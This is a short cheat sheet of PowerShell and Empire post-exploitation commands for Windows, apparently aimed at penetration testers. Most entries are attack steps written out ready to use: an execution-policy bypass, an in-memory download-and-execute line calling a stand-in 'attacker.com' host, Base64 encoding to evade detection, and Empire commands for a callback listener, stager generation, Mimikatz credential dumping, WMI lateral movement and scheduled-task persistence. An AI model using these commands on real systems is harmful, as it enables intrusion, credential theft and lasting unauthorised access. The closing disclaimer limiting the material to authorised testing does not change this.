PowerShell & Empire
Notes and snippets for PowerShell usage and post-exploitation frameworks. This content focuses on Windows environments and common post-exploitation techniques.
PowerShell Basics & Snippets
Bypass Execution Policy
powershell.exe -ExecutionPolicy Bypass -File script.ps1Execute PowerShell scripts without restrictions imposed by execution policies.
Download and Execute
IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/script.ps1")Download and execute a PowerShell script directly from a remote URL in memory.
Base64 Encoded Commands
powershell.exe -EncodedCommand BASE64_STRINGExecute Base64-encoded PowerShell commands to evade basic detection mechanisms.
Process Enumeration
Get-Process | Select-Object Name, Id, PathList running processes with their names, IDs, and executable paths.
Network Connections
Get-NetTCPConnection | Select-Object LocalAddress, LocalPort, StateEnumerate active TCP network connections on the system.
Empire & Post-Exploitation Concepts
Listener Setup
uselistener http
set Host http://attacker.com
set Port 80
executeConfigure an HTTP listener in Empire to receive connections from compromised hosts.
Stager Generation
usestager windows/launcher_bat
set Listener http
generateGenerate a stager payload that will connect back to the Empire listener.
Credential Harvesting
usemodule credentials/mimikatz/logonpasswords
executeUse Mimikatz through Empire to extract credentials from memory.
Lateral Movement
usemodule lateral_movement/invoke_wmi
set ComputerName TARGET_HOST
set Listener http
executeMove laterally to other systems using Windows Management Instrumentation.
Persistence Mechanisms
usemodule persistence/elevated/schtasks
set DailyTime 09:00
set Listener http
executeEstablish persistence using scheduled tasks that execute at specified times.
Note
These techniques are for educational purposes and authorized penetration testing only. Always ensure you have explicit written permission before testing on any system.